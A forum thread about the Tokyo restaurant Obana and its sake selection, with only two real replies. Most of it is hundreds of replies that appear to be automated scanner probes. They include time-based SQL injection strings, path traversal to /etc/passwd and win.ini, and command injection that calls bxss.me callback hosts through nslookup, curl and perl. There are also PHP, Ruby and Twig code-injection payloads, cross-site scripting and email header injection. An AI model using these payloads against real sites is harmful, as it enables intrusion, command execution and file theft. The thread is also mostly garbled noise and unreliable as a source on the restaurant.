I heard that seating at Obana is hard to get these days. Anyone have been to Obana recently?
I would like to know your thoughts about Obana.
Ps. If you have any knowledge about their sake selection, please share your thoughts as well. Thank you.
Copyright © 2015 TokyoTableTrip All Rights Reserved.
18 Comments
Haven't been there recently. But will be going in May. Am not sure whether they are accepting new customers, but if you have been there before and you let them know early, they can do something for you.
re: guest
LA1lHvc3
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+583-583-1=0+0+0+1
re: guest
-1 OR 3+583-583-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
HJhvuf0A'; waitfor delay '0:0:15' --
re: guest
-5 OR 268=(SELECT 268 FROM PG_SLEEP(15))--
re: guest
-5) OR 952=(SELECT 952 FROM PG_SLEEP(15))--
re: guest
-1)) OR 896=(SELECT 896 FROM PG_SLEEP(15))--
re: guest
m6dNFeuR' OR 11=(SELECT 11 FROM PG_SLEEP(15))--
re: guest
2OnlN4DC') OR 383=(SELECT 383 FROM PG_SLEEP(15))--
re: guest
noS1Kh4L')) OR 271=(SELECT 271 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@R24J9
re: guest
8L1ox5sa
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+879-879-1=0+0+0+1
re: guest
-1 OR 3+879-879-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
S51j0Ldi'; waitfor delay '0:0:15' --
re: guest
-5 OR 957=(SELECT 957 FROM PG_SLEEP(15))--
re: guest
-5) OR 795=(SELECT 795 FROM PG_SLEEP(15))--
re: guest
-1)) OR 877=(SELECT 877 FROM PG_SLEEP(15))--
re: guest
9M5acAUd' OR 295=(SELECT 295 FROM PG_SLEEP(15))--
re: guest
F8j1y0yw') OR 745=(SELECT 745 FROM PG_SLEEP(15))--
re: guest
5Qro0aPV')) OR 843=(SELECT 843 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@7Wgu1
re: guest
1BM3EQ40
re: guest
response.write(9718972*9583091)
re: guest
'+response.write(9718972*9583091)+'
re: guest
"+response.write(9718972*9583091)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
file:///etc/passwd
re: guest
${9999974+10000295}
re: guest
../
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
redirtest.acx
re: guest
^(#$!@#$)(()))******
re: guest
echo suoawe$()\ pmadgw\nz^xyu||a #' &echo suoawe$()\ pmadgw\nz^xyu||a #|" &echo suoawe$()\ pmadgw\nz^xyu||a #
re: guest
&echo kbghnf$()\ kozyuu\nz^xyu||a #' &echo kbghnf$()\ kozyuu\nz^xyu||a #|" &echo kbghnf$()\ kozyuu\nz^xyu||a #
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
|echo spduww$()\ yntazq\nz^xyu||a #' |echo spduww$()\ yntazq\nz^xyu||a #|" |echo spduww$()\ yntazq\nz^xyu||a #
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: guest
'.gethostbyname(lc('hitus'.'lwgfalqn9db25.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(87).chr(103).chr(76).'
re: guest
expr 9000798967 - 957631
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
".gethostbyname(lc("hitgz"."limfdsnt842e6.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(76).chr(104).chr(89)."
re: guest
/etc/shells
re: guest
(nslookup -q=cname hitubwvmwqflzf1180.bxss.me||curl hitubwvmwqflzf1180.bxss.me))
re: guest
gethostbyname(lc('hityq'.'kogisfwp2677e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(75).chr(110).chr(73)
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
$(nslookup -q=cname hitmbhmjqteyw4cb13.bxss.me||curl hitmbhmjqteyw4cb13.bxss.me)
re: guest
c:/windows/win.ini
re: guest
&nslookup -q=cname hitmyphgefsqp72823.bxss.me&'\"`0&nslookup -q=cname hitmyphgefsqp72823.bxss.me&`'
re: guest
bxss.me
re: guest
&(nslookup -q=cname hitmkbsxdzgbg301ff.bxss.me||curl hitmkbsxdzgbg301ff.bxss.me)&'\"`0&(nslookup -q=cname hitmkbsxdzgbg301ff.bxss.me||curl hitmkbsxdzgbg301ff.bxss.me)&`'
re: guest
Http://bxss.me/t/fit.txt
re: guest
|(nslookup -q=cname hitkffrjfnfgo57a92.bxss.me||curl hitkffrjfnfgo57a92.bxss.me)
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
`(nslookup -q=cname hitdgrojsazpv5b8d6.bxss.me||curl hitdgrojsazpv5b8d6.bxss.me)`
re: guest
;(nslookup -q=cname hitctmdsylcbv0b826.bxss.me||curl hitctmdsylcbv0b826.bxss.me)|(nslookup -q=cname hitctmdsylcbv0b826.bxss.me||curl hitctmdsylcbv0b826.bxss.me)&(nslookup -q=cname hitctmdsylcbv0b826.bxss.me||curl hitctmdsylcbv0b826.bxss.me)
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
'"()
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hithdhnycuwfiba863.bxss.me||curl${IFS}hithdhnycuwfiba863.bxss.me)
re: guest
';print(md5(31337));$a='
re: guest
'&&sleep(27*1000)*zyaevs&&'
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitsrazncnwef6c0dc.bxss.me||curl${IFS}hitsrazncnwef6c0dc.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitsrazncnwef6c0dc.bxss.me||curl${IFS}hitsrazncnwef6c0dc.bxss.me)&`'
re: guest
";print(md5(31337));$a="
re: guest
"&&sleep(27*1000)*jkojdl&&"
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
${@print(md5(31337))}
re: guest
'||sleep(27*1000)*wwwrkz||'
re: guest
bxss.me/t/xss.html?%00
re: guest
${@print(md5(31337))}\
re: guest
"||sleep(27*1000)*vfergq||"
re: guest
'.print(md5(31337)).'
re: guest
"+"A".concat(70-3).concat(22*4).concat(122).concat(65).concat(104).concat(73)+(require"socket"
Socket.gethostbyname("hitmt"+"tvxxmgdpdd076.bxss.me.")[3].to_s)+"
re: guest
'+'A'.concat(70-3).concat(22*4).concat(106).concat(68).concat(100).concat(90)+(require'socket'
Socket.gethostbyname('hitqz'+'psjnuckcb5c93.bxss.me.')[3].to_s)+'
re: guest
'A'.concat(70-3).concat(22*4).concat(114).concat(76).concat(103).concat(81)+(require'socket'
Socket.gethostbyname('hitky'+'stfwflcx30f67.bxss.me.')[3].to_s)
re: guest
'"
re: guest
<!--
re: guest
replies
re: guest
replies�
re: guest
replies/.
re: guest
'"()&%<zzz><ScRiPt >WAbI(9547)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitsmotpnptts51a2e.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >WAbI(9980)</ScRiPt>
re: guest
9315435
re: guest
aeBA3RHE
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
AJ5pCiQR'; waitfor delay '0:0:15' --
re: guest
-1 OR 412=(SELECT 412 FROM PG_SLEEP(15))--
re: guest
-1) OR 477=(SELECT 477 FROM PG_SLEEP(15))--
re: guest
-1)) OR 928=(SELECT 928 FROM PG_SLEEP(15))--
re: guest
suMhoRJ4' OR 972=(SELECT 972 FROM PG_SLEEP(15))--
re: guest
zMYNBoG9') OR 598=(SELECT 598 FROM PG_SLEEP(15))--
re: guest
F7ypqFxy')) OR 733=(SELECT 733 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@wSteP
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
I never been there, sadly. Hopefully, they still accept new customer.
re: Justeat
XjUYTap7
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
-1 OR 2+673-673-1=0+0+0+1
re: Justeat
-1 OR 3+673-673-1=0+0+0+1
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
0otCKp5A'; waitfor delay '0:0:15' --
re: Justeat
-5 OR 139=(SELECT 139 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 976=(SELECT 976 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 926=(SELECT 926 FROM PG_SLEEP(15))--
re: Justeat
brcBiyWL' OR 119=(SELECT 119 FROM PG_SLEEP(15))--
re: Justeat
AgEIxvwU') OR 895=(SELECT 895 FROM PG_SLEEP(15))--
re: Justeat
WSm9LO7i')) OR 923=(SELECT 923 FROM PG_SLEEP(15))--
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@0yHFM
re: Justeat
Y7nCncNn
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
-1 OR 2+396-396-1=0+0+0+1
re: Justeat
-1 OR 3+396-396-1=0+0+0+1
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
9ELgMjMM'; waitfor delay '0:0:15' --
re: Justeat
-5 OR 762=(SELECT 762 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 145=(SELECT 145 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 553=(SELECT 553 FROM PG_SLEEP(15))--
re: Justeat
HCXQut59' OR 897=(SELECT 897 FROM PG_SLEEP(15))--
re: Justeat
84NZksJo') OR 576=(SELECT 576 FROM PG_SLEEP(15))--
re: Justeat
HNWHLgVV')) OR 298=(SELECT 298 FROM PG_SLEEP(15))--
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@WysF3
re: Justeat
1DDDl4bCIlO
re: Justeat
response.write(9490078*9063779)
re: Justeat
'+response.write(9490078*9063779)+'
re: Justeat
"+response.write(9490078*9063779)+"
re: Justeat
%0abcc:074625.67-22185.67.8ed75.19990.2@bxss.me
re: Justeat
to@example.com>%0d%0abcc:074625.67-22186.67.8ed75.19990.2@bxss.me
re: Justeat
<esi:include src="http://bxss.me/rpb.png"/>
re: Justeat
${10000252+9999669}
re: Justeat
../../../../../../../../../../../../../../etc/passwd
re: Justeat
../../../../../../../../../../../../../../windows/win.ini
re: Justeat
file:///etc/passwd
re: Justeat
../../../../../../../../../../../../../../../proc/version
re: Justeat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Justeat
../../../../../../../../../../etc/passwd%00.jpg
re: Justeat
)
re: Justeat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Justeat
!(()&&!|*|*|
re: Justeat
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Justeat
^(#$!@#$)(()))******
re: Justeat
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Justeat
echo bjtige$()\ ctvbwe\nz^xyu||a #' &echo bjtige$()\ ctvbwe\nz^xyu||a #|" &echo bjtige$()\ ctvbwe\nz^xyu||a #
re: Justeat
/etc/passwd
re: Justeat
&echo hcercz$()\ cngytr\nz^xyu||a #' &echo hcercz$()\ cngytr\nz^xyu||a #|" &echo hcercz$()\ cngytr\nz^xyu||a #
re: Justeat
%2fetc%2fpasswd
re: Justeat
|echo mddxfk$()\ sepycf\nz^xyu||a #' |echo mddxfk$()\ sepycf\nz^xyu||a #|" |echo mddxfk$()\ sepycf\nz^xyu||a #
re: Justeat
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Justeat
(nslookup hitojpowlgbda30ecb.bxss.me||perl -e "gethostbyname('hitojpowlgbda30ecb.bxss.me')")
re: Justeat
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Justeat
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Justeat
'.gethostbyname(lc('hittf'.'fvigttgs8fc09.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(75).chr(107).chr(71).'
re: Justeat
$(nslookup hituwkztxwjtvc134d.bxss.me||perl -e "gethostbyname('hituwkztxwjtvc134d.bxss.me')")
re: Justeat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Justeat
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Justeat
".gethostbyname(lc("hitsm"."eaviafivba757.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(74).chr(116).chr(77)."
re: Justeat
&nslookup hitkoqrbhraqif01f7.bxss.me&'\"`0&nslookup hitkoqrbhraqif01f7.bxss.me&`'
re: Justeat
Http://bxss.me/t/fit.txt
re: Justeat
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Justeat
&(nslookup hittxxddduxxaace58.bxss.me||perl -e "gethostbyname('hittxxddduxxaace58.bxss.me')")&'\"`0&(nslookup hittxxddduxxaace58.bxss.me||perl -e "gethostbyname('hittxxddduxxaace58.bxss.me')")&`'
re: Justeat
http://bxss.me/t/fit.txt%3F.jpg
re: Justeat
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Justeat
|(nslookup hitbmoenhrlhp37f44.bxss.me||perl -e "gethostbyname('hitbmoenhrlhp37f44.bxss.me')")
re: Justeat
/etc/shells
re: Justeat
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Justeat
`(nslookup hitkdwdipkxkn4dcd8.bxss.me||perl -e "gethostbyname('hitkdwdipkxkn4dcd8.bxss.me')")`
re: Justeat
c:/windows/win.ini
re: Justeat
file:///etc/passwd
re: Justeat
;(nslookup hitjsruybenypd07ce.bxss.me||perl -e "gethostbyname('hitjsruybenypd07ce.bxss.me')")|(nslookup hitjsruybenypd07ce.bxss.me||perl -e "gethostbyname('hitjsruybenypd07ce.bxss.me')")&(nslookup hitjsruybenypd07ce.bxss.me||perl -e "gethostbyname('hitjsruybenypd07ce.bxss.me')")
re: Justeat
bxss.me
re: Justeat
/\../\../\../\../\../\../\../etc/passwd
re: Justeat
/WEB-INF/web.xml
re: Justeat
C:\WINDOWS\system32\drivers\etc\hosts
re: Justeat
HttP://bxss.me/t/xss.html?%00
re: Justeat
../../../../../../../../../../windows/win.ini%00.jpg
re: Justeat
bxss.me/t/xss.html?%00
re: Justeat
/../../../../../../../../../../boot.ini
re: Justeat
"+"A".concat(70-3).concat(22*4).concat(105).concat(72).concat(108).concat(71)+(require"socket"
Socket.gethostbyname("hitqr"+"wbiwpokc0c644.bxss.me.")[3].to_s)+"
re: Justeat
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Justeat
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Justeat
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Justeat
'+'A'.concat(70-3).concat(22*4).concat(100).concat(87).concat(116).concat(85)+(require'socket'
Socket.gethostbyname('hitpv'+'simtsbyg090e2.bxss.me.')[3].to_s)+'
re: Justeat
';print(md5(31337));$a='
re: Justeat
..\..\..\..\..\..\..\..\windows\win.ini
re: Justeat
";print(md5(31337));$a="
re: Justeat
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Justeat
${@print(md5(31337))}
re: Justeat
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Justeat
'"
re: Justeat
${@print(md5(31337))}\
re: Justeat
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Justeat
<!--
re: Justeat
'.print(md5(31337)).'
re: Justeat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Justeat
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\